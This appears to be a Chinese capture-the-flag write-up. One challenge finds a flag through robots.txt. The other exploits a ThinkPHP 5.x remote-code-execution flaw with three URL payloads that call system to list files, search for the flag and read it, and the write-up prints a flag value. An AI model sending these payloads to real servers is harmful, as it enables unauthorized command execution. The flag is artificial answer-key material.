Training-WWW-Robots
robots协议是Python爬虫时涉及到的一个协议,在URL后直接加上/robots.txt,显示如下图:
然后如图所示把/robots.txt改成/f10g.php后得到flag:
cyberpeace{dc7c764839800a9e351c917915b1e03e}
php_rce
根据题目的writeup:
百度后可知5.1版本的thinkPHP漏洞为 rce,在URL后加上payload
注:payload大概可以理解为关键信息
图中的payload1:index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=ls
payload2:index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=find / -name “flag*”
payload3:index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system& vars[1][]=cat /flag